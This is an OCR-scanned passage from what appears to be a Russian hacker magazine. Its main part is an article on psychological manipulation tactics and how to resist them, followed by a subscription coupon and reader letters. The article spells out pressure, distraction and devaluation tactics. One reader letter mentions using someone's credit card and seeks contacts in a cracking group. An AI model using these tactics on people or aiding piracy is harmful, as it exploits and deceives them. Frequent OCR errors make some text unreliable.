на магистральных каналах. В одиночку ты справишься с мелки- 
ми нападками, направленными на истощение ресурсов серве- 
ра, но окажешься беззащитным перед более-менее серьезным 
ОПоЗ'ом. ПС 
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ІЛЧІТ5 



АЛ ЕКСАНДР ЛОЗОВСКИЙ / І_О2ОѴ5КѴга0АМЕІ_АМО.Ки / 




Р5УСН0: 

ТЕАТР КОРЫСТНЫХ КУКЛОВОДОВ 

Психологические манипуляции: теория и защита 



Услышав фразу «психоло- 
гические манипуляции» или «психологическое 
воздействие», средний человек наверняка 
представит себе брутальных сотрудников 
спецслужб в штатском, говорящую голову из 
зомбоящика или двух топ-менеджеров круп- 
ных компаний, испытывающих друг на друге 
данное искусство в процессе ведения важных 
переговоров. 

В принципе, таконо и есть — эти люди действи- 
тельно практикуют психологическиетехники, 
но на деле большинство манипуляций пре- 
творяется в жизнь нами, обычными людьми. 
Сотни миллионов обывателей применяютих 
в повседневной жизни неосознанно, основы- 
ваясь на своем или чужом опыте (что вовсе не 
снижает их эффективности]. Дети используют 
их, выбивая ништяки из родителей. Работники 
— чтобы поиметь другдруга, подняться на вер- 
шину офисной пирамиды, присвоив себе чужие 
заслуги и отвратив внимание начальства от 
своих просчетов. Переговорщики — чтобы вы- 
требовать более выгодныеусловия, потратив 
на этом меньше денег. Иначе говоря, мы с тобой 
наверняка бывали и в роли манипулятора, и 
в роли жертвы («елки-палки, какже меня так 
поимели, а»), и в роли стороннего наблюдателя 
(«да, хитро его натянули, но он еще сопротивля- 
ется»), поскольку таковоужоно, межличност- 
ное общение разумных человеков. В рамках 
статьи мы рассмотрим, что же такое манипуля- 



ции, какие методы используются в процессе их 
реализации, кто является непосредственным 
участником, и как от всего этого «добра» защи- 
титься. Начнем, как всегда, с определения. 

рвАѴАизивРАТіо 

Манипуляция — это скрытое действо, которое 
позволяет одному, обладающему определен- 
ным навыком, человеку, склонитьдругого 
(менее умелого или более слабого] к измене- 
нию своих желаний, мотиваций или линии 
поведения в пользу манипулятора. Причем, не 
прямым обманом или угрозой, этаким хитрым 
способом, при котором он окажется как бы сам 
ответственным за принятое решение. Кажется, 
определение получилось весьма неплохим, 
хотя и не идеальным. Например, манипуляция 
можетбыть и не скрытой. Такили иначе, мани- 
пуляция — это навязывание мотивации другому 
человеку, использование его в качестве сред- 
ства для достижения своих собственных целей. 
Отлично, с этим более-менее разобрались. 
Самое время рассмотреть участников нашего 
театрализованного представления. 

список 

УЧАСТНИКОВ 

Те же и Хлестаков. Простите, гоню — в далеком 
XX веке, когда я учился в школе, это была очень 
крутая шутка. На самом деле, участниковтрое, 
их я уже перечислил выше: манипулятор, 
жертва(-ы], сторонний наблюдатель(-ли). 

• Манипулятор. Выбирает жертву, время, место 



и ситуацию для осуществления своих зловещих 
замыслов. Составляет план мероприятия, вы- 
бирает психологическиеточки приложения в 
сознании предполагаемой жертвы, конкретные 
«уловки» и проводит атаку. В общем, все как в 
хакинге. 

• Жертва. Стоит и обтекает. Хотя вру, не всегда. 
Жертва либо поддается на манипуляцию, ме- 
няя свои планы и желания, либо выстраивает 
контрмеры, переводя ситуацию, как минимум, 
в патовую. 

• Сторонние наблюдатели. Наблюдают за 
ситуацией со стороны или создают фон для 
манипуляции. Они имеют представление о 
ситуации, исходя из своей системы координат 
(в прямом общении неучаствуют, эмоциональ- 
ный контакт им недоступен, психологическое 
состояние участников они не разумеют, поэтому 
мнение у них будет л ибо не до конца верным, 
либо совсем неправильным). Ходить за при- 
мером далеко не надо, достаточно посмотреть 

в интернеты — сколько раз общественное мне- 
ние оказывалось на сторонетонкого тролля, 
который, используя свои навыки, доставал до 
кишок по-настоящему знающего и компетент- 
ного форумчанина. Которого, тем не менее, 
потом банили за грубость :]. 

ВРЕМЯ, МЕСТО, 

СИТУАЦИЯ 

Первый этап манипуляции — выбор времени и 
места. Вернее, даже не та к — времени, места, 
обстановки. Почему это важно? Да потому, что 
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правильный выбор можетбыть 
практически единственным и 
самым главным этапом мани- 
пуляции. Рассмотрим ситуацию 
со следующими участниками: 
бродячая продавщица цветов, ты и 
твоя девушка. Разумеется, давать 
деньги голодранцам или покупать 
цветы девушке до следующего 8-го 
марта ты не планировал. Вернее, 
не планировал бы, если бы атака 
произошла в другое время и в 
другом месте, а теперь — деваться 
некуда. В присутствии девушки 
ты не можешь послать старуху на 
три веселые буквы, особенно если 
она пойдет дальше, сказав нечто 
вроде «как же такой красивой 
девушке и не подарить розоч- 
ку». Классическая манипуляция 
свершилась — выбор есть, но вто 
же время его и нет. Либоты снижа- 
ешь карму в глазах своей девушки 
прямой конфронтацией с мани- 
пулятором (прямая конфронтация 
— практически всегда показатель 
слабости позиции!], либо идешь на 
поводу и оказываешься в дурацкой 
ситуации — вроде бы ты и не про- 
тив сделать девушке приятное, 
но ведь и про себя тоже думать 
надо. Неприятно чувствовать себя 
опрокинутым хитрой бабуленцией. 



Выход прост— принять правила 
игры, но вырваться из навязанной 
тебе ситуации. Да, девушка краси- 
вая. Да, заслуживает цветов. Ты с 
этим согласен, поэтому конфликт 
с девушкой не совершится. Но 
как избежать психологического 
шантажа? Очень просто: мы ведь 
как раз идем вон в тот супермаркет, 
где я вчера видел очень красивые 
бархатные розы. Аэти — гнилые, 
пожухлые и явно доставлены из 
региона с повышенным радиаци- 
онным фоном. Пока, бабушка! То 
же самое и с другими аналогич- 
ными манипуляциями —думай, 
выявляй события, которыми тебя 
шантажируют, и обходи их. 

Итак, важность времени и места 
мы разобрали, осталась ситуация. 
Этимтермином я объединяю как 
психологическое состояние жерт- 
вы, так и особенности окружающей 
его действительности. Усталость, 
тревожность, опьянение, нервоз- 
ность вследствие каких-то других 
внешнихсобытий или, наоборот, 

— гипоманиакальное состояние 
из-за передоза кофе или других 
стимуляторов (мысли бегают, пере- 
скакивают, никакой основатель- 
ности и последовательности в них 
нет), благостный настрой человека, 
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находящегося в отпуске (с трудом 
перестроится, на конфликт не пой- 
дет!) — все это лакомые состояния, 
обожаемые манипуляторами. Учти, 
чтолюбое изменениетвоегосо- 
стояния делает возможным сугге- 
стию — внушение манипулятором 
своей позиции в обход психологи- 
ческой защиты. То есть, позитивно, 
неконфликтно, на фоне хорошего 
эмоционального настроя. Прямо 
какдобрый папочка :]. 

ПРИЕМЫ КУНГ-ФУ 

Кажется, настало время перейти к 
водным процедурам — а имен- 
но, к перечислению конкретных 
приемов и уловок, используемых 
манипуляторами в своей практике. 
Наслаждайся! 

• Выигрыш во времени. Чтобы 
принять правильное решение, 
жертве нужно время на размышле- 
ние. Манипулятор, который обыч- 
но находится в более выгодном 
положении (ему все ясно, задача 
продумана], постарается создать 
ужертвы ощущение цейтнота. В 
общем, «думайте скорее, люди 
ждут, очередь напирает. Что тут 
читать, все и так подписывают». В 
частности, эта уловка постоянно 
используется в присутствен- 



И опятьДейл Карнеги, 
выпустивший сотню ми- 
льонов книг, посвящен- 
ных манипулированию 
окружающими. Респект 
ему и хвала, заработать 
кучуденегна книгахо 
манипулировании — 
высший класс. Даже не 
надо никем манипулиро- 
вать :) 



ных местах вроде магазинов и 
сбербанков — народ из очереди 
бузит, требует скорости, обвиняет 
тебя во всех человеческих по- 
роках только потому, что ты вдруг 
взялся читать подписываемый 
договор или детально осматри- 
вать свежекупленную технику. 

В условиях психологического 
давления и недостатка времени 
трудно сохранитьтрезвость мысли. 
Абстрагируйся оттолпы, осознай, 
что точка зрения этого сборища 
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Еще один гуру мира манипуляций — товарищ 
Хаббард, автор сайентологии. Подвиги известны, 
в дополнител ьных комментариях не нуждается 



Горячая тема в и нтернетах. Тысячи ссылок, 
вагоны ничего не объясняющих статей, масса 
дезинформации. Красота-то какая! 




• Если хочешьузнать 
о манипуляциях 
больше, обязательно 
нагугли научный труд 
Доценко Е.Л. «Психо- 
логия манипуляции». 
Единственная про- 
блема — он весьма 
тяжело написан, 
поэтому прочтение 
его способно надолго 
поставить твой мозг 

в позу речного скор- 
пиона. 

• Традиционный 
респект отавтора 
врачу-психиатру 
Трасковецкой И. Г. 
за мудрый совет 

и ценные коммента- 
рии к гото в о му те кету. 



конфликтных старушенций для 
тебя не имеет совершенно никако- 
го значения. И — читай, проверяй, 
задавай вопросы. Обязательно 
будь готов отказать. Да, готов отка- 
зать, все бросить и пойти в другой 
магазин, несмотря на то, что ты уже 
отстоял очередь, и до празднова- 
ния дня рождения друга осталось 
два часа. Достаточно простой 
готовности — манипулятор ее по- 
чувствует. Жизнь показывает, что 
если речь не идет о прыжке из окна 
горящего здания — время всегда 
есть. Поэтому самотребование 
«быстро-быстро» в отсутствии по- 
жара — уже нехороший признак. 

• Рассеивание внимания. Опыт- 
ный манипулятор весьма эффек- 
тивно отвлекаетвниманиежертвы, 
фиксируя его на своихжестах, 
интонации, переводя разговор на 
левые темы и нагоняя тумана в ис- 
тиннойтеме обсуждения. Приведу 
пример. Ты идешь на рынок, поку- 
паешь несколько единиц разного 
товара. Продавец много жести- 
кулирует, что-то рекламирует, 
постоянно изрыгаетфразы вроде 
«сын покупалъ — тебе продаю , 
рубль сверху — три в уме , сюда 
пишу — оттуда вычитаю, штаны 
померяй, да, пять рублей 
есть, итого семь, так ведь? , 
я тогда... э-э-э... сколько это 
сдам, погоди, дай посчитаю, 
нет, два рубля есть? Ладно, 
вот держи десять, рубль по- 
том занесешь , так уж и быть». 
Большое спасибо! Воттолько с 
точки зрения математики это не 
он тебе рубльуступил, а наоборот, 
еще 80 рупий должен :). Здесь мы 
видим целую цепь манипуляций 



— продавец, демонстрируя очень 
положительный и располагающий 
эмоциональный настрой, мастер- 
ски отвлекает внимание, перегру- 
жает мозг покупателя ненужными 
подробностями (второй прием!], 
заставляя жертву соглашаться с 
ним по ходу вычислений (несмотря 
на то, что в них сам Степ не разбе- 
рется, а ведь он учился в Бауман- 
ке!]. Это третий прием — потом 
жертве будет труднее отпираться, 
сам же соглашался. И в конце — 
подтверждает свое расположение, 
уступая нам рубль. Дескать, он 
нам доверяет, искренне веря, что 
мы его «потом занесем». Сама 
наивность, кактакому не поверить, 
зачем пересчитывать? 

Вывод простой — если видишь, 
что собеседник «мутит воду» — 
удваивай бдительность. Воз- 
вращай улыбку, подстраивайся 
под положительный настрой и 
обламывай манипуляции в корне 
путем интеллигентного, но четкого 
возвращения дискуссии или вы- 
числений в правильное русло. К 
приятным людям, злоупотребляю- 
щим витиеватой жестикуляцией, 
вообще нужно относиться насто- 
роженно (а вдруг имеют намерение 
тебя втранс вогнать?) 

• Атаки на самооценку. Эти 
вмешательства проводятся путем 
реализации психотехник«обесце- 
нивание» и «игнорирование». В 
прошлой статье я обращал особое 
внимание на важность самооцен- 
ки, так вот, враги народа всегда 
будут рады испытать ее на проч- 
ностьсвоими психологическими 
эксплойтами, поскольку человек 
с пониженной самооценкой 



становится уязвим практически ко 
всем описанным манипулятивным 
уловкам. Обесценивание — это 
критика, нередко — оченьжесткая 
критика компетентности, профес- 
сиональной пригодности, личных и 
социальных качеств жертвы. Мало 
опыта, работать не умеете, проект 
в прошлом году завалили, да и что 
еще ждать от та ко го молодого (ма- 
нипуляция возрастом!) человека 
ста ким образованием? И ведь не 
учится ничему, хоть мы и продол- 
жали надеяться. До сегодняшнего 
дня. Держим из жалости, одно 
слово. Идите ксебе. 
«Игнорирование» — как нетрудно 
догадаться из названия, стольже 
некорректная техника, основанная 
на подчеркнуто пофигистичном 
отношении кжертве вообще и 
кее мнению в частности. Сам 
понимаешь, что если в процессе 
чтения твоего доклада слушающий 
чешется во всех интимных местах, 
перешептывается с соседями, 
рисует голыхженщин на полях 
тетради... поневоле почувствуешь 
себя придурком, а свой доклад — 
полным и окончательным отстоем. 

• Миллионы мух не могут оши- 
баться. Все покупают. Врачи- 
стоматологи рекомендуют. 
Ведущие собаководы советуют. 
Настоящие мужчины выбирают. 
Такие дела, никто не хочет по- 
чувствовать себя ненастоящим 
мужчиной, который не при- 
слушивается к рекомендациям 
ведущих врачей-стоматологов, 
или выглядеть глупее, чем эти 
самые «все». Кэтой же категории 
уловок относится «большинство 
профессоров считают», «Пете 
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МеЫІіса знаеттолк 
в манипуляциях 



мама уже купила» и многие другие. 
Противодействие простое — высо- 
кая самооценка, адекватное само- 
мнение и оценка своей компетент- 
ности, использование фраз вроде 
«ну, я-то не все» (произносить с 



видом императорского пингвина], 
«хе-хе, да-да, миллионы мух не 
могут ошибаться», «какие именно 
профессора? Имена, фамилии. 
Могули я найти ихтруды в доодіе 
зсбоіаг, или они настолько крутые, 
что им не индексируются?». Дет- 
ские же манипуляции из серии «а 
вот кому-то уже купили/назначили/ 
выдали квартиру» легко разби- 
ваются родительскими контрма- 
нипуляциями вроде (принимаем 
правила игры) «тебетоже купим/ 
назначим/выделим, если будешь 
себя хорошо вести/работать/цело- 
вать меня туда, где никогда не 
светит солнце» (навязываем свои 
условия]. А как это «хорошо себя 
вести»? Каковы критерии? Крите- 
рии не обозначены, что открывает 
широкую дорогу для использова- 
ния приема «обесценивание». 

• Вывести из себя. Психотехника 
под названием «эмотирование» 



часто применяется манипулятора- 
ми. В процессе реализации мани- 
пулятор старается вывести жертву 
из эмоционального равновесия, 
вызваву нее негативные эмоции 
— гнев, злость, раздражение и т.д. 

В зависимости от поставленных 
целей, техника позволит л ибо пре- 
кратить неприятную для манипу- 
лятора дискуссию («сначала вести 
себя научись, а потом требуй себе 
в подарок машинку с радиоуправ- 
лением/прибавку кжалованью/ 
руководство в этом проекте»], либо 
облегчить применение другихтех- 
никза счеттого, что гнев — плохой 
советчик для жертвы, поскольку 
он снижает внимание, концентра- 
цию, мыслительные способности и 
способность к принятию реше- 
ний. Крометого, раздраженный 



человекотрицательно выглядит 
в глазах сторонних наблюдате- 
лей. Достигается эмотирование 
либо элегантным образом, вроде 
переведения разговора на лич- 
ность оппонента или обсуждения 
его прошлого (смотри ниже), 
либо — явноне очень корректным 
поведением (не слушать, хихикать, 
надолго выходить, отвлекаться 
на явно левые дела и звонки по 
мобильномутелефону]. 
Какзащититься? Держать себя в 
руках, явно, позой и поведением 
показывать, что «этим тебя не 
проймешь», корректно переводить 
разговор в изначальное русло. 
Если чувствуешь, что выведен из 
себя и врядли способен стабили- 
зироваться, придется использо- 
ватьлегальные паузы — протирать 
очки, раскуриватьтрубку и т.д. 

Как вариант, перейди в соседнее 
помещение, чтобы разорвать 



порочный круг манипулятивного 
контакта и привести свои мысли 
в порядок. Ирина Геннадьевна 

до п ол н я ет : «Главное оружие 
против этой техники — тер- 
пение. Не торопись, делай 
паузы, когда их делает на- 
хальный манипулятор , осо- 
бенно, если чувствуешь , что 
вышел из себя. Присоединение 
к его ритму в общении дает 
козырь тебе и выбивает козыри 
у него». 

• Невысказанное и додуманное. 
Какя уже говорил выше, одной 
из составных частей процесса 
манипуляции является добро- 
вольный перенос ответственности 
за принятое решение с манипу- 
лятора на его жертву. Хорошим 
способом заставитьжертву взять 



на себя ответственность является 
использование намеков. Поэтому, 
если начальниквдругначалтебе 
рассказывать о том, какой в стране 
нынче бушует суровый кризис, 
и кактяжко в его условиях стало 
содержать ряды программистов на 
сишарпе, не спеши догадываться, 
что ты как раз и есть тот самый 
балластный программист, и что 
ты прямо-таки пышешьжеланием 
написать заявление «по собствен- 
ному». Не бери на себя ответствен- 
ность за чужие решения. 

Весьма часто этот манипулятив- 
ный прием используется, когда 
манипулятор хочет свою жертву 
о чем-то попросить. Знакомая 
ситуация? «Ух, такая вот фигня, 
совершенно не понимаю, что с 
этой машиной делать, и времени 
нет, то л и жиклер тормозит, то ли 
клапана не подсасывают». «Да 
нет проблем, давай я посмотрю!». 



Стоп. Тебя просили? Нет! Ответ- 
ственность передана полностью. 
Чукча хочет — чукча платит, а стало 
быть — это ты захотел починить 
чужую машину, и теперь манипуля- 
тор не должен тебе даже простого 
«спасибо». Он просто скажет тебе 
«а что такого, я тебя не про- 
сил» и будет совершенно прав. 
Заставляй (контрманипуляциями] 
собеседников прямо, в явном виде 
формулироватьсвои просьбы 
и сразу оговаривай объемы по- 
следующей благодарности. Помни, 
что дается людям легко, обычно 
ими не ценится :]. 

• Дай палец — откусим руку. Согла- 
сившись на малое — согласишься 
и на большее. Задержишься на 
часок? Значит, со временем тебя 
подобьютзаночевать на работе. 
Пригласили на портретную съемку 
у профессионального фотографа? 
По ходу дела согласилась сфо- 
тографироваться в купальнике? 
Вечером, по дороге домой, наша 
героиня будет думать: «Ой, какая 
я дура, зачем же согласилась 
фотографироваться совсем- 
совсем голой?». В общем, ты 
понял, что нужно думать заранее, 
предвидеть развитие событий и 
четко очертить границы, через ко- 
торыеты переступать не намерен. 

• Мудрость веков, аксиомы и вечные 
ценности. Не позволяй собеседнику 
прессовать тебя аксиоматическими 
истинами, афоризмами и цитатами 
ученых мужей древности. Если ты 
види ш ь, что собеседн и к п ытается 
склонить тебя ксогласию со своим 
утверждением только потому, что 
его частью является «тащи с за- 
вода каждый гвоздь, ты здесь 
хозяин, а не гость» или « репів 
Іопдиз — габіх ѵіСае», — немило- 
сердно расчленяй манипуляторские 
утверждения на части и комментируй 
их соответственно. Да, маму надо 
любить. Я согласен с этим утвержде- 
нием и сам люблю свою маму. Но это 
незначит, что я готов пожертвовать 

1 00 космических кредитов в фонд 
«Мамочки роботов». Спасибо за 
предложение, до свидания. 



КАКЗАЩИТИТЬСЯ? ДЕРЖАТЬ СЕБЯ В РУКАХ, ЯВНО, 
ПОЗОЙ И ПОВЕДЕНИЕМ ПОКАЗЫВАТЬ, ЧТО «ЭТИМ 
ТЕБЯ НЕ ПРОЙМЕШЬ», КОРРЕКТНО ПЕРЕВОДИТЬ 
РАЗГОВОР В ИЗНАЧАЛЬНОЕ РУСЛО. 



Совет №5. Запишись в фитнес! 

Шутки шутками, но это действительно того стоит. Полезно иногда по- 
гонять систему, чтобы понять её возможности и найти решения, как их 
увеличить. Фитнес — это способ хорошенько погонять себя (особенно 
зимой) ! Да и скидки во всех залах сейчас очень большие. 
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ІЛЧІТ5 




Герои 

телесериала 
«Побегиз 
тюрьмы» 
только и 
делают, что 
манипулируют 
ДРУГ другом. 
Теодор 
Бэгвелл — 
один из самых 
изощренных 
манипуляторов 



• Грехи прошлого. Манипуляторы с удовольствием при- 
поминают своим жертвам их былые подвиги. Как может 
человек потянуть проект по автоматизации докумен- 
тооборота на предприятии, если ранее он был уличен в 
утере полкового знамени? В разврате на рабочем месте, 
отрывании крыльев бабочкам, потоптании муравейников. 
Защититься непросто. Главное — сохранять спокойствие, 
не отрицать прошлых свершений и, не оправдываясь, 
провести границу между прошлым и настоящим. Кто из 
присутствующих не совершал ошибок? Если подозрева- 
ешь, что этот прием может быть применен к тебе — дей- 
ствуй превентивно, продемонстрировав окружающим, 
что ты придерживаешься позиции «Ну, кто не ошиба- 
ется? Тот , кто ничего не делает! ». Лучше на приме- 
ре — рассказав о чьем-то красивом обломе и подытожив, 
что ты обломавшегося нивчемнеобвиняешьи даже ему 
сочувствуешь, поскольку на его месте мог быть каждый, и 
ты в том числе. Кроме того, помни про «эта ошибка была 
уроком, я многому научился и теперь знаю, как 
таких ошибок избежать». Работает на «ура»! 

• Манипуляции с использованием межличностного про- 
странства. Прием, имеющий широкое хождение в сфере 
личной жизни и околосемей ных отношений. Сюда от- 
носятся манипуляции «доступ к телу», « прием ближе- 
дальше» и прочие уловки, связанные сугрозой разрыва 
или увеличения межличностного расстояния. Подозреваю, 



что подробности ты можешь домыслить и сам, а на предмет 
«ближе-дальше» — погуглить по околопикаперским сай- 
там. Прием этот заключается в задании одним из партнеров 
«рваного ритма»отношений,тоестьпропадатьна пару 
дней (либо в тесный контакт не вступать], а затем позволить 
себе некоторое время интимного общения. Прием непри- 
ятный, считается, что он позволяет дольше поддерживать 
«накал» отношений, облегчает манипулирование партне- 
ром (явно дает показать, что «чем меньше женщину мы 
любим...» и в любой моментможем бросить]. На самомже 
деле — обычный грязный манипулятивный прием, который 
ведетксносу крыши и невротизации второй половины. 

• Разрешите спросить! Любимая уловка офисныхтрол- 
лей. Раздолбайские и малокомпетентные зеленокожие 
гуманоиды целыми днями докучают окружающих вопро- 
сами вроде « что делать с этой линеечкой в ворде , 
чего это она посреди экрана торчит? Как бы мне 
заменить буквицу на колонтитул и помножить все 
это на тезаурус?». Цель проста — заставить окру- 
жающих прийти к решению, что «проще взять и сделать 
самому». Противопоставь злобному троллю контрмани- 
пуляцию — сделай так, чтобы все стало еще хуже. Пусть 
после твоего вмешательства буквица займет весь экран, 
а половина шрифтов вообще пропадет в неизвестном 
направлении. Кстати, если ты предварительно вынесешь 
мозг манипулятору необходимостью читать книгу «Ком- 
пьютер для чайников» (разумеется, с улыбкой, позитивно 
и без особенной издевки] — вообще супер. Проверено на 
себе — сейчас никто в больнице не обращается ко мне с 
эникейными вопросами :]. 

ЗАКЛЮЧЕНИЕ 

Во всех неприглядных подробностях мы рассмо- 
трели процесс манипуляции, не забыв перечислить 
и наиболее часто используемые злобными мани- 
пуляторами психологические уловки. Разумеется, 
информация не исчерпывающа, но, надеюсь, будет 
тебе полезна. Предупрежден — значит, вооружен. Ду- 
маю, после прочтения этой статьи ты с удовольстви- 
ем будешь замечать, что все окружающие тебя люди 
только и делают, что пытаются другдругом манипули- 
ровать :]. Держись, не поддавайся! ц-ц 



Старое доброе кино о манипуляциях. Советую пересмотреть после прочтения статьи 
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ГОДОВАЯ ПОДПИСКА ПО ЦЕНЕ 

2100 руб. ( на 15% дешевле чем 

при покупке в розницу) 



Единая цена по всей России. Доставка за счет издателя, 
в том числе курьером по Москве в пределах МКАД 



ВНИМАНИЕ! 

ВТОРОЕ СПЕЦПРЕДЛОЖЕНИЕ! 

При подписке на комплект журналов 

ЖЕЛЕЗО + ХАКЕР + ОШ 

- Один номер всего за 1 55 рублей (на 25% дешевле, чем в розницу) 



ЗА 12 МЕСЯЦЕВ ЗА 6 МЕСЯЦЕВ 




Подписка на журнал «ХАКЕР+ЦѴР» на 6 месяцев 
стоит 1200 руб. 



По всем вопоосам 



связанным с подпиской, звоните по 
бесплатным телефонам 8(495)780-88-29 (для москвичей) и 
8(800)200-3-999 (для жителей других регионов России, або- 
нентов сетей МТС, БиЛайн и Мегафон). Вопросы о подпис- 
ке можно также направлять по адресу іпіо@дІс.ги или 
прояснить на сайте ѵѵѵѵѵѵ.СЮ.ги 



ВЫГОДА • ГАРАНТИЯ • СЕРВИС 

КАК ОФОРМИТЬ ЗАКАЗ 

1. Разборчиво заполните подписной купон и квитанцию, вырезав 
их из журнала, сделав ксерокопию или распечатав с сайта ѵѵѵѵѵѵ. 
діс.ги. 

2. Оплатите подписку через Сбербанк . 

3. Вышлите в редакцию копию подписных документов — купона и 
квитанции — любым из нижеперечисленных способов: 

• по электронной почте зиЬзсгіЬе@дІс.ги; 

• по факсу 8 (495) 780-88-24; 

• по адресу 119021, Москва, 

ул. Тимура Фрунзе, д. 11, стр. 44, 

ООО «Гейм Лэнд», отдел подписки. 

ВНИМАНИЕ! 

Подписка оформляется в день обработки купона и квитанции в редакции: 

• в течение пяти рабочих дней после отправки подписных документов 
в редакцию по факсу или электронной почте; 

• в течение 20 рабочих дней после отправки подписных документов по 
почтовому адресу редакции. 

Рекомендуем использовать факс или электронную почту, в последнем 
случае предварительно отсканировав или сфотографировав документы. 
Подписка оформляется с номера, выходящего через один кален- 
дарный месяц после оплаты. Например, если вы производите оплату 
в апреле, то журнал будете получать с июня. 



Оформить подписку на Хакер стало еще проще! 

С июля 2009 года это можно сделать в любом из 
72 000 платежных терминалах ОІѴѴІ (КИВИ) по всей 
России. 




ПОДПИСНОЙ КУПОН 

ПРОШУ ОФОРМИТЬ ПОДПИСКУ 
I НА ЖУРНАЛ « 

□ на 6 месяцев 

□ на 12 месяцев 

начиная с 200 г. 



г -1 Доставлять журнал по почте 
1 — 1 на домашний адрес 

Доставлять журнал курьером : 

□ на адрес офиса* 

□ на домашний адрес** 

(отметь квадрат выбранного варианта подписки) 

Ф.И.О. 



АДРЕС ДОСТАВКИ: 

индекс 

область/край 

город 

улица 

дом корпус 

квартира/офис 

телефон ( ) 

код 

е-таіі 

сумма оплаты 

*в свободном поле укажи название фирмы 
и другую необходимую информацию 
**в свободном поле укажи другую необходимую информацию 
и альтернативный вариант доставки в случае отсутствия дома 

свободное поле 



Извещение 



ИНН 7729410015 ООО «Гейм Лэнд» 

АБ «ОРГРЭСБАНК», г. Москва 



р/с N° 40702810509000132297 



к/с № 30101810900000000990 



БИ К 044583990 




КПП 770401001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 
Оплата журнала « 


» 


Сумма 


с 


200 г 





Кассир 



Ф.И.О. 

Подпись плательщика 



Квитанция 



ИНН 7729410015 



ООО «Гейм Лэнд» 



АБ «ОРГРЭСБАНК», г. Москва 
р/с № 40702810509000132297 



к/с № 30101810900000000990 



БИК 044583990 




КПП 770401001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 
Оплата журнала « 


» 


Сумма 


с 


200 г 





Кассир 



Ф.И.О. 



Подпись плательщика 






ІЛЧІТ5 




ОТ: ЛМММУ 

<]іппппѵ]опе22[ЭЬк.ги> 

ТЕМА: Деньги за статьи 

Здравствуйте, Андрей Матвеев. Могу ли я 
рассчитывать на какое-либо денежное воз- 
награждение или это прерогатива постоян- 
ных писателей? Простоу меня есть возмож- 
ность писать много и постоянно, интузиазма 
много, но кушать-то охота... :). 

Есть возможность как-то узнать, какие 
статьи были уже опубликованы в журнале, 
чтобы не получилосьтак, что я написал 
статью, а надобность в ней отпадает? 

Буду рад любому ответу... 

С уважением, Л тт ту 



ОТ: СКЕОООЫТ 




<сгеос1оп[(буапс1ех.ги> 

КОМУ: П очта журнала 
< тадагі пейгеа [.хакер, ги > 

АТТАСН: Игрок. сіос (62 КБ) 

Пожалуйста, посмотрите мой рассказ. 



Отвечаю на это и аналогичное лаконичное 

(«Здравствуйте! Вы публикуете статьи читате- 
лей?»] письма разом. 

Привет. Джимми! 

1. Да, в большинстве случаевты можешь 
рассчитывать на денежное вознаграждение. 
Мы бы и сами были бы рады напаритьавторов 
(«чего-чего? В сам Хакер писать, да еще и де- 
ньги за это получать?»], но правила таковы, что 
за каждую статью автору полагается гонорар. 
Правда, в кризисные времена его, бывает, 
задерживают :]. 

2. Да, еслиты предложишь реальную тему, то 
вполне возможно, что твоя статья понравится 



редактору, и он ее опубликует. Чтобы узнать о 
том, какие статьи были опубликованы в журна- 
ле, нужно его (журнал] регулярно читать. 

3. Ответы на все аналогичные вопросыты най- 
дешь в моей статье «Новогодний журнализм»: 
ѵѵѵѵѵѵ.хакер.ги/тааа2Іпе/х5/049/1 06/1 .азр 
(2004 год, ностальжи!). Быть столпом русской 
словесности вовсе не обязательно, но все же 
не забывай курить мануалы по русскому языку, 
поскольку ошибки вроде «интузиазма» как-то 
не очень вяжутся с журналистской карьерой. 



Привет. Креодонт! Не отношу себя к мастерам 
анализа чужих художественных креативов, но, 
на мой взгляд — сюжет нормальный, рассказ 
написан хорошим языком. Я перешлютвой 



монументальный труд, посвященный личному 
и социальному грехопадению игрозависимой 
личности, компетентным людям, пусть решат 
вопрос о публикации. 





ОТ: ТАГАЙЧИНОВААНЯ < кІіакзаСае 1 .ги > 

ТЕМА: ***статья: «ІССІ Сервер» 

Здравствуйте! 

Моя статья называется: « I СО сервер, поддерживающий ІСО клиентов различных версий». 
Это тема моей бакалаврской работы, никогда нигде не публиковала свои работы, решила 
попробовать. Мне посоветовали отправить ее Вам. Надеюсь, Вам понравится. 



Р.5.: Если нужно, я могу подкорректировать статью: убрать некоторые моменты или, 
наоборот, некоторые части написать подробнее. 



о 



Привет. Аня! 

Спасибо за письмо, Никитосв процессеего про- 
чтения расчувствовался и даже пустил скупую 
' слезу (причину он мне не сообщил, подозреваю 
ностальгические воспоминания о девушке- 
программистке]. Тем не менее, тему интересной 
не назову, но если будутдругие идеи — пиши, 
обсудим. 
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0Т: ТоіпЬІ5 МакагоіпЬіз дЫзйаті ..с от> 

ТЕМА:***помощь 

Добрий ден, Никита, 

если вы не против, буду писат па ангелску. 

[доодіеіхапзіаію] 

- Прежде всего — поздравил с Литвой. 

Я вырос с литовскими версия «Хакер», большие времена, которое, даже удалось купить а по пут ігег. 
_ сот счете помощью кредитной карты некоторых парень, чье письмо епсІзйтісгозоГ.сопп . ІЧеіЬіоз 
ошибокв ѴѴіпсІоѵѵз 98 — много веселья было, или повешение половины компьютеров в I пбоВа Н: 
компьютерной конференции с С:\Соп\Соптрюк — спасибо вам, все, что узнали много полезной 
удовольствие от вас, но, вероятно, это самая разбудили любопытство было самое лучшее, что я 
получил от чтения «Хакер»-- он учил, что всегда есть другой способ сделать это, тем лучше, и что это 
™ удовольствие пытаются ее найти. Любознательность, которая помогает нетолько при расчете, но и 
во всех сферах жизни. Спасибо, ребята! Существует одна скромная просьба помочь У меня. Дело в 
■- — - - - том, что мне действительно нужно связаться зотопе, кто знает, кого-то из «ПІ5Е команда» взлом- 

щики коллектива. Причина, мне нужно связаться с состоит в том, чтобы предложить новую версию 
программного обеспечения, они уже до трещины. Не связанные стрещинами вариантновой версии 
предоставляется только для корпоративных клиентов, так что, возможно, они бы іпіегезеіесі сами 
получитьего ...Ли попытаться загрузить все своитрещины и проверить ЫРОз (30 на сегодняшний 
день ...;), но адреса электронной почты, они обеспечивают Есть больше не действует. Попытка объ- 
единить # крекеры на ЕгееІЧосІе, но предложить только. 

“ Почему я написания вами? Причина Россия дала рождение в ад много талантливых программистов 
/ хакеров/ крекеров, и, я думаю, вы или кто-то в новостях (есть один? Или вы с работы домой? Просто 

из любопытства — работал в качестве журналиста я довольно долгое время ...], возможно, знают 

некоторые из них, и они могли бы знать ... тем, что цепочка будет заканчиваться на «Різе КОМАНДА». 
Пожалуйста, если уделать какие-либотип контакта, который вы считаете, могли бы мне помочь, я бы 
